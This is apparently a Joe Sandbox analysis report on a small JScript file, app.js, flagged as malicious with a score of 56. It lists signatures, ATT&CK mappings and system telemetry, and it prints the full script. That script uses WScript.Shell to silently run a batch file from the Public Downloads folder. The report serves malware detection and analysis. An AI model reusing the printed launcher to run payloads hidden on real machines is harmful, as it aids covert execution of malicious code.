Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
app.js

Overview

General Information

Sample name:app.js
Analysis ID:1540522
MD5:4128e6986decef9a51c622cdf46ff040
SHA1:5c738033641d0faadf27480ad5e7175042a95c8b
SHA256:76274ad152d007e38e60e90f31af0cfaf90d8b54fa40232673c5b0512fb3a3af
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found WSH timer for Javascript or VBS script (likely evasive script)
Program does not show much activity (idle)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 7804 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\app.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\app.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\app.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\app.js", ProcessId: 7804, ProcessName: wscript.exe
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\app.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\app.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\app.js", ProcessId: 7804, ProcessName: wscript.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: classification engineClassification label: mal56.evad.winJS@1/0@0/0
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeAutomated click: OK
Source: C:\Windows\System32\wscript.exeAutomated click: OK

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateTextFile("Z:\syscalls\9431.js.csv");ITextStream.WriteLine(" entry:4 f:");ITextStream.WriteLine(" exec:7 f:");IWshShell3._00000000();ITextStream.WriteLine(" entry:43 o: f:Run a0:%22C%3A%5CUsers%5CPublic%5CDownloads%5Crun.bat%20C%3A%5CUsers%5CPublic%5CDownloads%5C%22 a1:0 a2:false");IWshShell3.Run("C:\Users\Public\Downloads\run.bat C:\Users\Public\Downloads\", "0", "false")
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: wscript.exe, 00000000.00000002.1469710641.000001BF328D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information11
Scripting
Valid AccountsWindows Management Instrumentation11
Scripting
1
DLL Side-Loading
1
DLL Side-Loading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
Boot or Logon Initialization ScriptsRootkitLSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager2
System Information Discovery
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
app.js0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
No contacted IP infos
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1540522
Start date and time:2024-10-23 21:23:52 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 2m 57s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:5
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • GSI enabled (Javascript)
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:app.js
Detection:MAL
Classification:mal56.evad.winJS@1/0@0/0
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .js
  • Stop behavior analysis, all processes terminated
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • VT rate limit hit for: app.js
No simulations
No context
No context
No context
No context
No context
No created / dropped files found
File type:Unicode text, UTF-8 text, with CRLF line terminators
Entropy (8bit):4.410584697662754
TrID:
    File name:app.js
    File size:387 bytes
    MD5:4128e6986decef9a51c622cdf46ff040
    SHA1:5c738033641d0faadf27480ad5e7175042a95c8b
    SHA256:76274ad152d007e38e60e90f31af0cfaf90d8b54fa40232673c5b0512fb3a3af
    SHA512:2d4bb4220b4dc1404f00a21a58c37c8edc74645ec240b18a073c91c491ae265dac47cee92669b93afdcb55c11d0ddd5c7411b99fc566f53764187137ce17df84
    SSDEEP:12:2sK1OjDBpVEa47BiVFg+JfN2zp48WfuG/4:2sK1OjDBbEa41iVFgEfNyW2s4
    TLSH:26E0860DEE4DA5956C36F3A9AB3B010DF9D201A31650D656784CB1905F7055801BDFF6
    File Content Preview:(function() {.. var a = "C:\\Users\\Public\\Downloads\\";.. var b = a + "run.bat";.. var c = a + "";.. var d = "WScript.Shell";.. var e = "...... ......: ";.... try {.. var f = new ActiveXObject(d);.. if (f) {..
    Icon Hash:68d69b8bb6aa9a86
    No network behavior found

    Click to jump to process

    Click to jump to process

    Click to dive into process behavior distribution

    Target ID:0
    Start time:15:24:55
    Start date:23/10/2024
    Path:C:\Windows\System32\wscript.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\app.js"
    Imagebase:0x7ff6328c0000
    File size:170'496 bytes
    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Call Graph

    • Executed
    • Not Executed
    callgraph clusterC0 clusterC2C0 clusterC4C2 clusterC6C4 clusterC8C2 E1C0 entry:C0 F3C2 E1C0->F3C2 F7C6 Run F3C2->F7C6 F9C8 error F3C2->F9C8 F5C4 ActiveXObject()

    Script:

    Code
    0
    ( function () {
    • () ➔ undefined
    • () ➔ undefined
    1
    var a = "C:\\Users\\Public\\Downloads\\";
      2
      var b = a + "run.bat";
        3
        var c = a + "";
          4
          var d = "WScript.Shell";
            5
            var e = "\x062d\x062f\x062b \x062e\x0637\x0623: ";
              6
              try
                7
                {
                  8
                  var f = new ActiveXObject ( d );
                    9
                    if ( f )
                      10
                      {
                        11
                        f.Run ( b + " " + c, 0, false );
                        • Run("C:\Users\Public\Downloads\run.bat C:\Users\Public\Downloads\",0,false) ➔ undefined
                        12
                        }
                          13
                          else
                            14
                            {
                              15
                              }
                                16
                                }
                                  17
                                  catch ( g )
                                    18
                                    {
                                      19
                                      console.error ( e + g.message );
                                        20
                                        }
                                          21
                                          } ) ( );
                                            Reset < >